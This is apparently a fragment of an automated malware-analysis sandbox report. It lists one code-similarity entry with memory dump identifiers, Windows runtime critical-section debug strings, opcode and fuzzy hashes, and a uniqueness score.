                                                                    • Associated: 00000007.00000002.600176683.00000000036AB000.00000040.00000001.sdmp
                                                                    • Associated: 00000007.00000002.600192417.00000000036AF000.00000040.00000001.sdmp
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                    • API String ID: 885266447-3903918235
                                                                    • Opcode ID: d9d5f7dba3707ca96316ec1fc9054506c44fc6430e5c8ffb73384e3cd8cd0ce4
                                                                    • Instruction ID: 8c3126b019e07a9ea268379c37ce7f7b20de8b79668946781e432c89b5d42f48
                                                                    • Opcode Fuzzy Hash: d9d5f7dba3707ca96316ec1fc9054506c44fc6430e5c8ffb73384e3cd8cd0ce4
                                                                    • Instruction Fuzzy Hash: EDF0F636640601BFD7209A45DD06F67BF6AEB45730F140324F7285A5E1DA62F82096F4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%